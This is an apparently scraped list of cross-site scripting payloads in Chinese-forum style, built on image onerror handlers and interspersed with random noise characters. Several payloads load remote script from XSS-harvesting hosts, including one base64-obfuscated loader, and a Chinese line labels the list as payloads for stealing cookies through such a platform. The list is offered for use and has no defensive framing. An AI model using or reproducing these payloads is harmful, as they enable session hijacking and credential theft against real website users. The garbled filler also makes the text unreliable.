<img src='non-exist.jpg'onerror="alert('xss')">
8 R: q" W6 K0 F) i& z' y! G<img src=# onerror=alert(123)>
, m3 r* d! H7 |, J9 u! x0 |2 P<img src=# onerror=alert(document.cookie)>9 w2 A7 B4 m$ w" ~: |5 a/ S& F
下面是利用平台钓cookie的
# [1 q9 F- l& f8 \3 k- ^ <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>- p" I( s0 }7 S/ P! u1 A/ J
# }- J3 V2 g. L3 N, [6 @
* ~" N" A' @6 H% e) ? E7 h2 E' Y<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>: L T ?, P e# j$ z. r6 x
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>0 a* o( s. m$ r; W1 ?
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
8 ?- ]4 v0 V4 ]( W r; N<img src=1 onerror=jQuery.getScript("//xss.re/974")> ; ]! y. Y2 s P0 k; G/ L7 N d
<img src="#">
7 ]# `6 d* F8 w+ x<img src="#">
4 S- h# B7 e; G6 k% L2 X<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
- y# q+ I$ v* ^4 _2 w* @<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">6 T/ j- i- O# M5 ]- o. O% X
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
% h% Q1 ^9 w. ~; |/ J. C! [7 v<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
6 s" ~9 ` m6 s+ l% ~. v<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>* Q' |# i) z) j3 E7 f) H* o
<img src=x width="0" height="0"></img>
/ \0 u1 y0 _' s' z( _6 U3 F<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
1 `( G9 `0 b) F6 @$ k<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>9 o) p9 ]5 \; \
|